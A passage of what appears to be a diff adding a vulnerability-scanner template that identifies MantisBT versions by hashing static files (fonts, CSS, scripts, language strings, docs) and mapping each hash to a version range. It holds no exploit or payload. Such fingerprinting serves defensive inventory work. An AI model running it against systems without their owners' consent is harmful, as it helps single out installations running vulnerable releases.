"(\"ab9eab3e0b79e8a762a38e2c3a5d67fe\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/list-1.5.0.min.js" + + matchers: + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"69b60bc29a0554523767949686b4d089\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_georgian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.15.1 + dsl: + - "(\"3f8b6cd21447bfa0d80b707491a46a82\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.19.1 + dsl: + - "(\"6405d932353c2f471e1767be2dbc1251\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"cd622ff54375e6de06d7d8ad8d0a23ec\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/email.xml" + + matchers: + - type: dsl + name: 2.2.1 - 2.7.1 + dsl: + - "(\"0cfafb6fbc23cc4d49760c09a2a7a547\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.2.0 + dsl: + - "(\"46c761469f6450d9050838378a424138\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"05fcf101c1a3543d41016c77ddf51e0a\" == md5(body))" + - type: dsl + name: 1.3.7 - 1.3.20 + dsl: + - "(\"e1f08481981a14c94d8a3de0893f2206\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"d817041c6d71a76272284dbf72b274d6\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.12.2 + dsl: + - "(\"f43868d27e4f04898bb04c2a3d54e5c4\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"60a288d023f3c5865a5813b245d704d2\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.19.1 + dsl: + - "(\"f937e4506a1ec48a9430ba2d06da516d\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"bbcff26fad31954eb5c1b7f60c47ae76\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_arabic.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.16.1 + dsl: + - "(\"2ee3e4bcc2ff0e81ce4cede70cbb9a12\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"1bd1e8ed65c1b80984595595dc93ed24\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"06dfda368f2f034a22668a883caf2349\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"6a8249690d6698f1bc0b75aa9e83c216\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"a09b735652554d6c9e0e811c081a4f16\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"b4652f0b0fab0298ee0545dbb27a61fc\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"9c67b2a8174cdafcd13f9b909263f9f6\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"498fb646bb2cb2d64538f3d56e629b40\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"849b9b31cd3b32c786fe3cc0ac64dfbb\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"716bcae0ca148190b94fa7e6000b2dde\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/files/MantisGraph.js" + + matchers: + - type: dsl + name: 2.6.0 - 2.19.1 + dsl: + - "(\"d4d8db83403027518854d4d309d46a8e\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.5.2 + dsl: + - "(\"86df6cd3b1d4aa585f8e25286e1e12b4\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"f650e7e9d98eb87533a736c3542f18a6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/About.xml" + + matchers: + - type: dsl + name: 2.0.0 - 2.19.1 + dsl: + - "(\"5610af32e408039ce5950d2d10b5108f\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"9d98ecd9ee400319e886e73fbc7c56f7\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"1fc9b46e38288ee3e1280dfb7b44d85f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/User_Management.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.19.1 + dsl: + - "(\"5cd44ff6192fba2cf4966dd08ac7bc0b\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"3f0241d6b54081e04a7863ffeb7bfe25\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/defaults.xml" + + matchers: + - type: dsl + name: 1.3.5 - 2.12.2 + dsl: + - "(\"e2a7020f4b6c12e8fe02b40a1cb4849a\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.4 + dsl: + - "(\"ef591d5f7af28891e16a1ae2c0b3c565\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.19.1 + dsl: + - "(\"4f2ae3ef252cf5c5072ecf6a4993abb0\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"9e81802c540223082413a4ca2362368c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/bugFilter.js" + + matchers: + - type: dsl + name: 2.0.0 - 2.19.1 + dsl: + - "(\"12e0dbed3bb11b3436627df1fa521a92\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"674b95ad1e0f0b69c3c8d1bd2183f161\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"c1c07b11136a0db11a7d4e739f53c171\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/api.xml" + + matchers: + - type: dsl + name: 2.3.0 - 2.7.1 + dsl: + - "(\"4ac7af66b103d441f6b7fc4950727adc\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.19.1 + dsl: + - "(\"888c00d3b43b9c390f0334e662f71fbd\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.24.3 + dsl: + - "(\"8df4f5b37cf538ad82d2d03e58c96287\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_korean.txt" + + matchers: + - type: dsl + name: 1.3.0 - 2.17.2 + dsl: + - "(\"d89050e8f6baeac1cf364dcaa0938a82\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"325120daa788a852aaeb917d07832b22\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"9afb7504f23ef0574829d8c631a5d1e9\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.24.3 + dsl: + - "(\"22f35300e8bae8d4b4f914a4426811af\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace.min.css" + + matchers: + - type: dsl + name: 2.2.0 - 2.17.2 + dsl: + - "(\"0d402fa2406129b96dd755426478c1b4\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"8365b49cafe06e69f16135104c789d17\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.24.3 + dsl: + - "(\"02befb55d0870d1ab08c663366bc3361\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/Contributors.xml" + + matchers: + - type: dsl + name: 2.6.0 - 2.17.2 + dsl: + - "(\"0b778e46f6bafb8c781a16c10f661fda\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.5.2 + dsl: + - "(\"2316362165e117458785fb9f5188c85b\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.24.3 + dsl: + - "(\"4ae956f9944ca20b4dab51bab756f392\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/ace.css" + + matchers: + - type: dsl + name: 2.2.0 - 2.14.0 + dsl: + - "(\"a43cf675668abcb7df974d67057b4402\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.1.3 + dsl: + - "(\"57ac99bda9ae1bdf4dae8993c747405e\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.17.2 + dsl: + - "(\"6b62094dd219aae041b86df8bc27fe40\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.24.3 + dsl: + - "(\"2c17a8afcbe15c72ccef09cb07a6746a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-latin-ext-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"81d0487ba73afd292730e6f89e83c2ea\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/montserrat-v12-cyrillic-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"a2a3cd147df9e0612151fa8542e4b472\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/montserrat-v12-cyrillic-ext-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"da45fc1615e5aadb48c15cc0963de76d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/montserrat-v12-latin-ext-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"1119d054247d1182914a754403e3af6a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-latin-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"cffb686d7d2f4682df8342bd4d276e09\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/poppins-v5-latin-ext-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"257009726ee9341c25d0a8bb00f6c8a5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/poppins-v5-latin-ext-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"6fc407b725b0f9f3c7bd99efe9c9b232\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/poppins-v5-devanagari-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"53459fe489b4dcd4054116588e3cd192\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-vietnamese-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"60468fcc14ac48c9d83a54f87ecaaf49\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/poppins-v5-latin-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"ce0c9ae08840a0b43bccb9f5a86e155d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-cyrillic-ext-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"c4a9a5af7ec6e23da632fbc59ea9f48b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/poppins-v5-devanagari-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"08f9ec63b3615e0230a51de92a3c0ec1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-latin-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"bf2d0783515b7d75c35bde69e01b3135\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-greek-ext-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"85f6cabcf02592149e8d2a8828382ab4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-greek-ext-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"bdddca22419a3aeeb45c1e6e32c85ebf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/poppins-v5-latin-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"1fce830e6112511a77108832e13172fd\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-vietnamese-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"c0328dd564c14e8f927a3094dacadcec\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-greek-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"c7fe1c527eca6602d47381453a6c752e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/montserrat-v12-vietnamese-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"fdddaad1faff8909d0a81c00ad3d4b7a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-cyrillic-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"717cff603d36688def7eb25fe772a791\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/montserrat-v12-latin-ext-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"bef7e247546617f705fd7b8e7ac4a962\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/montserrat-v12-vietnamese-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"a9449c25b74f409f70bea838e01de952\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-greek-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"f8067dc6a76122598490f24dcf71790d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/montserrat-v12-latin-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"f29d2b8559699b6beb5b29b25b8bc572\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-cyrillic-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"ca41c456ce6ba8dcffc9a7272a199283\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/montserrat-v12-cyrillic-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"a94a53ece6ec3d49129705386596a1fb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-latin-ext-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"2b6f63fce9104d1223d83dd12cd6038e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/montserrat-v12-latin-regular.woff2" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"501ce09c42716a2f6e1503a25eb174c9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/montserrat-v12-cyrillic-ext-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"194b0c8e55426677a0eaf4c333490fe6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/fonts/open-sans-v15-cyrillic-ext-regular.woff" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"429a11ad779becf78b99c854ce49bab1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_italian.txt" + + matchers: + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"966b44a74ba67759efc71f9c09df4958\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_bengali.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.15.1 + dsl: + - "(\"b28a1a09bd1384038644197a5981e04e\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"e39524ab6c88673a8d542df5f56b7dc0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_bengali.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.15.1 + dsl: + - "(\"a47e6f2aeeec218e460fa7c2ade0ce53\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"e92e0fec1c9717a55d4520cdf6a43abc\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/css/fonts.css" + + matchers: + - type: dsl + name: 2.11.0 - 2.15.1 + dsl: + - "(\"c62cd6151b2a781c14f1f47622a3424d\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"04d7fd99a70a2a3be868f89b8f8b996a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_amharic.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.15.1 + dsl: + - "(\"ff6f7ca6db4768555ab08ce44774e0ed\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"c8b761048b59afb87a6c785238217898\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.3 + dsl: + - "(\"342309ef258993a3e037af4557a42b32\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.12 + dsl: + - "(\"2a2688003e8577b4efe4bd87712ac3d5\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"407e21be44d92d294c56b803a917f824\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"fe3b3ede269348369d81626d3bc2916c\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"77efad0008ab3e3516b48401ef3948e2\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"ef990cb0aaa1f655bb4c33492c1b76ee\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"59e57035e4e061e23a08c4c8e3095cf2\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.24.3 + dsl: + - "(\"b65020fd1bdb1defb1adc2bf23035bbe\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_icelandic.txt" + + matchers: + - type: dsl + name: 2.14.0 - 2.24.3 + dsl: + - "(\"cc4b04b7c9bad00e79ed0e4b891e4693\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_icelandic.txt" + + matchers: + - type: dsl + name: 2.14.0 - 2.24.3 + dsl: + - "(\"7819d21b66b47592c9c92388da31881b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_korean.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.13.2 + dsl: + - "(\"92dedcbdbaf8e21011c38d6ddca62b47\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.24.3 + dsl: + - "(\"b7a2a69f9a013640bb67650b16212ab0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_greek.txt" + + matchers: + - type: dsl + name: 2.0.0 - 2.13.2 + dsl: + - "(\"cf0b9c759d9ed770de4e69b0ad4965f9\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"fdcdaa14f718b5b7cf57cd41f8687120\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.24.3 + dsl: + - "(\"1617ac6c29c5a57b7f3f0ffe532df6ef\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/Workflow.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.13.2 + dsl: + - "(\"7e86b278229808a00fed1eb2a0d32f3f\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.24.3 + dsl: + - "(\"b076f5646e0d7d8b245a30da0e8e3ba3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/myview.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.13.2 + dsl: + - "(\"580bd23d687853bb7950ec8568fa89c6\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.24.3 + dsl: + - "(\"92138a9f2982dbbfe7d18bbb1d3cd1fe\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/date.xml" + + matchers: + - type: dsl + name: 2.0.0 - 2.8.1 + dsl: + - "(\"52723090d9158568cf08c3a4be527ba2\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"dafefcbdcc481f46211e8d91aa2d8324\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.13.2 + dsl: + - "(\"d36212e7c222ae3e03fc4ae76585ab91\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.24.3 + dsl: + - "(\"5af0f94c7b57dd3c6a9512844b718447\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Admin_Guide/en-US/config/webserver.xml" + + matchers: + - type: dsl + name: 1.3.0 - 2.11.1 + dsl: + - "(\"6147dcbe54e195cb88643e6686726d2d\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"67c655d947a1c8de9592bbc9e8e314ce\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_georgian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"fb8a11aa872aaf252839cedf7c8b7ae2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_piedmontese.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"52f6126718bf93470f44a6518d1f3161\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_georgian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"2476461935b7617a6297a9c41f1dc362\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_malay.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"445c74bf0c8b1f999f981eaa62f52fda\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_telugu.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"437903040f931943d527cfcefec17124\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_upper_sorbian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"beb3ab125bc3235bdf74e65c1254a784\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_persian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"7a6f9032b30b9bee27f830a055fd0087\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_lower_sorbian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"97f3ce751f4dfb82997bd3d245acda27\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_malayalam.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"94ffcfcad7cc39f975586bb237a20d55\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_lezgi.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"4889d5565075d1884fdcf5d8f5064c25\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_tachelhit.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"445bff125e0095bc90f4123c7eb074d0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_bosnian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"f55e61df281638764528015435d4bc38\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_luxembourgish.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"db05d0e638e5f1a458b1e85fb2e80922\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisCoreFormatting/lang/strings_indonesian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"087d1d512f8cb3545c69dec204f7e1b3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_piedmontese.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"a33954ff3048ef824b3fc34b4a194d69\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_georgian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"fed17663a6f39f44237525b877e9418e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_tunisian_arabic.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"45ab5b3d2d76438d9f500c22df4bfcbb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_zazaki.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"6068377b3b4fd7bd5af883f0ac5cc2d9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_mirandese.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"e84ba2159b76fce0ffa635aea71b8760\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_luxembourgish.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"a583a210fbd9f5d9d0bf105c9ef16e73\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.24.3 + dsl: + - "(\"975c77b1190b1617e8f638e7269a501e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/XmlImportExport/lang/strings_indonesian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"ac923215f26875ba9fb7b11636fa5799\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_danish.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"fd253676a2851741bae307fe948df40d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_russian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"d0308df73e048ea42e49dad36b0a08a9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_macedonian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"759d64dd26386ea5632a56f4d169e39d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_ukrainian.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"56bd09dd8dd5e6c66451a89a9e0737f5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_belarusian_tarask.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"264c852a6cf5e2c5770f89dab065b2ed\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_swedish.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"16728d7d30bd819bbea578f3cae11294\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_chinese_traditional.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"d955514da415435e17762c8587f0f73b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_german.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"169d298b5d6c0afc5cc55857d89c7a47\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_portuguese_brazil.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"5133b16f3f8a073e98d60f8d9ac5c554\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_chinese_simplified.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"4d47be3189b8832001d5b48790dba324\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_portuguese_standard.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"65894c7fe3ed8345d6beecd1516c6f2f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_czech.txt" + + matchers: + - type: dsl + name: 2.12.0 - 2.24.3 + dsl: + - "(\"aa98b6c123eaba84722737efab28b328\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_qqq.txt" + + matchers: + - type: dsl + name: 2.12.0 - 